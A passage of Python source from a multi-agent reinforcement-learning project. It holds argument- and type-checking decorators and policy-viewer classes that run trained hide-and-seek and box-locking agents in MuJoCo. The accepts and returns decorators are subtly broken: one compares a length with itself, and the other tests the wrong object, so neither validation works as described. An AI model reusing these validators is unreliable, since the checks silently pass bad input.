if hasattr(fun_handler, "__wrapped__"):
fun_handler = fun_handler.__wrapped__
if inspect.isclass(fun_handler):
fun_handler = fun_handler.__init__
spec = inspect.getfullargspec(fun_handler)
fun_args = []
if spec.args is not None:
fun_args += spec.args
if spec.kwonlyargs is not None:
fun_args += spec.kwonlyargs
# function accepts kwargs. Therefore, we pass all arguments.
if spec.varkw is not None:
args_to_pass = kwargs
args_remaining = {}
else:
args_to_pass = dict([(k, v) for k, v in kwargs.items() if k in fun_args])
args_remaining = dict([(k, v) for k, v in kwargs.items() if k not in fun_args])
return args_to_pass, args_remaining
def store_args(method):
"""Stores provided method args as instance attributes."""
argspec = inspect.getfullargspec(method)
defaults = {}
if argspec.defaults is not None:
defaults = dict(
zip(argspec.args[-len(argspec.defaults):], argspec.defaults))
if argspec.kwonlydefaults is not None:
defaults.update(argspec.kwonlydefaults)
arg_names = argspec.args[1:]
@functools.wraps(method)
def wrapper(*positional_args, **keyword_args):
self = positional_args[0]
# Get default arg values
args = defaults.copy()
# Add provided arg values
list(
map(args.update, (zip(arg_names, positional_args[1:]), keyword_args.items())))
# Store values in instance as attributes
self.__dict__.update(args)
return method(*positional_args, **keyword_args)
return wrapper
class Maybe(type):
''' Metaclass to match types with optionally none. Use maybe() instead '''
maybe_type = type(None) # Overridden in derived classes
def __instancecheck__(self, instance):
return isinstance(instance, self.maybe_type) or instance is None
def __repr__(self):
return "<class Maybe({})>".format(self.maybe_type)
def maybe(arg_type):
'''
Helper for @accepts and @returns decorator. Maybe means optionally None.
Example:
@accepts(maybe(int), str, maybe(dict))
def foo(a, b, c):
# a - can be int or None
# b - must be str
# c - can be dict or None
See: https://wiki.haskell.org/Maybe
'''
class Derived(metaclass=Maybe):
maybe_type = arg_type
return Derived
# Copied from
# http://pythoncentral.io/validate-python-function-parameters-and-return-types-with-decorators/
def accepts(*accepted_arg_types):
'''
A decorator to validate the parameter types of a given function.
It is passed a tuple of types. eg. (<type 'tuple'>, <type 'int'>)
Note: It doesn't do a deep check, for example checking through a
tuple of types. The argument passed must only be types.
See also the maybe(), used for types that are optionally None.
'''
def accept_decorator(validate_function):
''' Do not call this function directly! Use @accepts(...) instead! '''
# Check if the number of arguments to the validator
# function is the same as the arguments provided
# to the actual function to validate. We don't need
# to check if the function to validate has the right
# amount of arguments, as Python will do this
# automatically (also with a TypeError).
@functools.wraps(validate_function)
def decorator_wrapper(*function_args, **function_args_dict):
if len(accepted_arg_types) is not len(accepted_arg_types):
raise InvalidArgumentNumberError(validate_function.__name__)
# We're using enumerate to get the index, so we can pass the
# argument number with the incorrect type to
# ArgumentValidationError.
for arg_num, (actual_arg, accepted_arg_type) in enumerate(zip(function_args, accepted_arg_types)):
if not isinstance(actual_arg, accepted_arg_type):
ord_num = _ordinal(arg_num + 1)
raise ArgumentValidationError(ord_num,
validate_function.__name__,
accepted_arg_type)
return validate_function(*function_args, **function_args_dict)
return decorator_wrapper
return accept_decorator
def returns(*accepted_return_type_tuple):
'''
Validates the return type. Since there's only ever one
return type, this makes life simpler. Along with the
accepts() decorator, this also only does a check for
the top argument. For example you couldn't check
(<type 'tuple'>, <type 'int'>, <type 'str'>).
In that case you could only check if it was a tuple.
See also maybe() for optionally returning a type or None
'''
def return_decorator(validate_function):
''' Do not call this function directly! Use @returns(...) instead ! '''
# No return type has been specified.
if len(accepted_return_type_tuple) == 0:
raise TypeError('You must specify a return type.')
@functools.wraps(validate_function)
def decorator_wrapper(*function_args, **function_args_dict):
# More than one return type has been specified.
if len(accepted_return_type_tuple) > 1:
raise TypeError('You must specify one return type.')
# Since the decorator receives a tuple of arguments
# and the is only ever one object returned, we'll just
# grab the first parameter.
accepted_return_type = accepted_return_type_tuple[0]
# We'll execute the function, and
# take a look at the return type.
return_value = validate_function(*function_args, **function_args_dict)
return_value_type = type(return_value)
if isinstance(return_value_type, accepted_return_type):
raise InvalidReturnType(return_value_type,
validate_function.__name__)
return return_value
return decorator_wrapper
return return_decorator
def _ordinal(num):
'''
Returns the ordinal number of a given integer, as a string.
eg. 1 -> 1st, 2 -> 2nd, 3 -> 3rd, etc.
'''
if 10 <= num % 100 < 20:
return '{0}th'.format(num)
else:
ord = {1: 'st', 2: 'nd', 3: 'rd'}.get(num % 10, 'th')
return '{0}{1}'.format(num, ord)
class ArgumentValidationError(ValueError):
'''
Raised when the type of an argument to a function is not what it should be.
'''
def __init__(self, arg_num, func_name, accepted_arg_type):
self.error = 'The {0} argument of {1}() is not a {2}'.format(arg_num,
func_name,
accepted_arg_type)
def __str__(self):
return self.error
class InvalidArgumentNumberError(ValueError):
'''
Raised when the number of arguments supplied to a function is incorrect.
Note that this check is only performed from the number of arguments
specified in the validate_accept() decorator. If the validate_accept()
call is incorrect, it is possible to have a valid function where this
will report a false validation.
'''
def __init__(self, func_name):
self.error = 'Invalid number of arguments for {0}()'.format(func_name)
def __str__(self):
return self.error
class InvalidReturnType(ValueError):
'''
As the name implies, the return value is the wrong type.
'''
def __init__(self, return_type, func_name):
self.error = 'Invalid return type {0} for {1}()'.format(return_type,
func_name)
def __str__(self):
return self.error
```
#### File: hns/viewer/policy_viewer.py
```python
import time
import glfw
import numpy as np
from operator import itemgetter
from mujoco_py import const, MjViewer
from mujoco_worldgen.util.types import store_args
from envs.hns.ma_policy.util import listdict2dictnp
from functools import reduce
import pdb
import torch
import copy
def handle_dict_obs(keys, order_obs, mask_order_obs, dict_obs, num_agents, num_hiders):
# obs = []
# share_obs = []
for i, key in enumerate(order_obs):
if key in keys:
if mask_order_obs[i] == None:
temp_share_obs = dict_obs[key].reshape(num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = dict_obs[key].reshape(num_agents,-1).copy()
temp_mask = dict_obs[mask_order_obs[i]].copy()
temp_obs = dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros((mins_temp_mask.sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
# obs.append(reshape_obs)
# share_obs.append(reshape_share_obs)
# obs = np.array(obs)[:,num_hiders:]
# share_obs = np.array(share_obs)[:,num_hiders:]
obs = reshape_obs[num_hiders:]
share_obs = reshape_share_obs[num_hiders:]
return obs, share_obs
def splitobs(obs, keepdims=True):
'''
Split obs into list of single agent obs.
Args:
obs: dictionary of numpy arrays where first dim in each array is agent dim
'''
n_agents = obs[list(obs.keys())[0]].shape[0]
return [{k: v[[i]] if keepdims else v[i] for k, v in obs.items()} for i in range(n_agents)]
class PolicyViewer(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.ob = env.reset()
for policy in self.policies:
policy.reset()
assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
while self.duration is None or time.time() < self.end_time:
if len(self.policies) == 1:
action, _ = self.policies[0].act(self.ob)
else:
self.ob = splitobs(self.ob, keepdims=False)
ob_policy_idx = np.split(np.arange(len(self.ob)), len(self.policies))
actions = []
for i, policy in enumerate(self.policies):
inp = itemgetter(*ob_policy_idx[i])(self.ob)
inp = listdict2dictnp([inp] if ob_policy_idx[i].shape[0] == 1 else inp)
ac, info = policy.act(inp)
actions.append(ac)
action = listdict2dictnp(actions, keepdims=True)
self.ob, rew, done, env_info = self.env.step(action)
self.total_rew += rew
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_hs_single(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, all_args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
# self.order_obs = ['agent_qpos_qvel', 'box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
# self.mask_order_obs = ['mask_aa_obs', 'mask_ab_obs','mask_ar_obs',None,None,None]
self.order_obs = ['agent_qpos_qvel', 'box_obs','ramp_obs','construction_site_obs', 'observation_self']
self.mask_order_obs = [None,None,None,None,None]
self.keys = self.env.observation_space.spaces.keys()
self.num_agents = 2
self.num_hiders = 1
self.num_seekers = 1
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_seekers):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
# rearrange action
action_movement = []
action_pull = []
action_glueall = []
for k in range(self.num_hiders):
#action_movement.append(np.random.randint(11, size=3)) #hider随机游走
action_movement.append(np.array([5,5,5])) #hider静止不动
action_pull.append(0)
action_glueall.append(0)
for k in range(self.num_seekers):
action_movement.append(actions[k][0][:3])
action_pull.append(np.int(actions[k][0][3]))
action_glueall.append(np.int(actions[k][0][4]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.total_rew += rew
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bl(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.args = args
self.num_agents = args.num_agents
self.total_rew = 0.0
self.dict_obs = env.reset()
self.eval_num = 10
self.eval_episode = 0
self.success_rate_sum = 0
self.step = 0
self.H = 5
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
self.order_obs = ['agent_qpos_qvel', 'box_obs', 'ramp_obs', 'construction_site_obs', 'observation_self']
self.mask_order_obs = [None, None, None, None, None]
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
# generate the obs space
obs_shape = []
obs_dim = 0
for key in self.order_obs:
if key in self.env.observation_space.spaces.keys():
space = list(self.env.observation_space[key].shape)
if len(space)<2:
space.insert(0,1)
obs_shape.append(space)
obs_dim += reduce(lambda x,y:x*y,space)
obs_shape.insert(0,obs_dim)
split_shape = obs_shape[1:]
self.policies[0].base.obs_shape = obs_shape
self.policies[0].base.encoder_actor.embedding.split_shape = split_shape
self.policies[0].base.encoder_critic.embedding.split_shape = split_shape
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
while (self.duration is None or time.time() < self.end_time) and self.eval_episode < self.eval_num:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.step += 1
#READ INFO
self.test_lock_rate[self.step] = env_info['lock_rate']
self.test_return_rate[self.step] = env_info['return_rate']
if env_info['lock_rate'] == 1:
self.test_success_rate[self.step] = env_info['return_rate']
else:
self.test_success_rate[self.step] = 0
# print("Step %d Lock Rate"%self.step, self.test_lock_rate[self.step])
# print("Step %d Return Rate"%self.step, self.test_return_rate[self.step])
# print("Step %d Success Rate"%self.step, self.test_success_rate[self.step])
#print(self.dict_obs['box_obs'][0][0])
self.total_rew += rew
self.is_lock = self.test_lock_rate[self.step]
self.is_return = self.test_return_rate[self.step]
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False) or self.step >= self.args.episode_length - 1:
self.eval_episode += 1
self.success_rate_sum += np.mean(self.test_success_rate[-self.H:])
print("Test Episode %d/%d Success Rate:"%(self.eval_episode, self.eval_num), np.mean(self.test_success_rate[-self.H:]))
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
self.add_overlay(const.GRID_TOPRIGHT, "Lock", str(self.is_lock))
self.add_overlay(const.GRID_TOPRIGHT, "Return", str(self.is_return))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
if self.eval_episode == self.eval_num:
print("Mean Success Rate:", self.success_rate_sum / self.eval_num)
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
# reset the buffer
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
self.step = 0
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bl_good_case(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.args = args
self.num_agents = args.num_agents
self.total_rew = 0.0
# init starts
self.eval_num = 1
self.eval_episode = 0
self.success_rate_sum = 0
self.step = 0
self.H = 5
buffer_length = 2000
boundary = args.grid_size-2
boundary_quadrant = [round(args.grid_size / 2), args.grid_size-3, 1, round(args.grid_size/2)-3]
start_boundary = [round(args.grid_size / 2), args.grid_size-3, 1, round(args.grid_size/2)-3] # x1,x2,y1,y2 qudrant set
last_node = node_buffer(args.num_agents, args.num_boxes, buffer_length,
archive_initial_length=args.n_rollout_threads,
reproduction_num=160,
max_step=1,
start_boundary=start_boundary,
boundary=boundary,
boundary_quadrant=boundary_quadrant)
#self.starts = last_node.produce_good_case(self.eval_num, start_boundary, args.num_agents, args.num_boxes)
self.starts = [[np.array([16, 4]), np.array([21, 2]), np.array([22, 2]), np.array([16, 4])]]
print("[starts]", self.starts[0])
self.dict_obs = env.reset(self.starts[0])
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
self.order_obs = ['agent_qpos_qvel', 'box_obs', 'ramp_obs', 'construction_site_obs', 'observation_self']
self.mask_order_obs = [None, None, None, None, None]
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
# generate the obs space
obs_shape = []
obs_dim = 0
for key in self.order_obs:
if key in self.env.observation_space.spaces.keys():
space = list(self.env.observation_space[key].shape)
if len(space)<2:
space.insert(0,1)
obs_shape.append(space)
obs_dim += reduce(lambda x,y:x*y,space)
obs_shape.insert(0,obs_dim)
split_shape = obs_shape[1:]
self.policies[0].base.obs_shape = obs_shape
self.policies[0].base.encoder_actor.embedding.split_shape = split_shape
self.policies[0].base.encoder_critic.embedding.split_shape = split_shape
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.test_lock_rate = np.zeros(self.args.episode_length)
